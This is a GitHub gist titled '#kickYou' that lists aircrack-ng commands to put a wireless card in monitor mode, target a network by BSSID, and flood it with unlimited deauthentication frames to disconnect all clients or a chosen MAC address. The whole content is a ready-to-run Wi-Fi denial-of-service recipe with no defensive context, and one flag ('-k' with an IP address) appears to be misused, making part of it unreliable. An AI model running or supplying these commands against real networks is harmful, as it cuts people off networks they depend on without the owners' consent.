Created
August 26, 2019 09:17
-
-
Save DastanIqbal/11677a16a3e61261050fac98fd69592c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#kickYou | |
airmon-ng check kill | |
airmon-ng start wlan0 | |
airodump-ng --bssid <bssid> wlan0 | |
aireplay-ng --deauth 0 -a (networks bssid) -k (ip address) | |
aireplay-ng --deauth 0 -a (networks bssid) -c (mac address) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment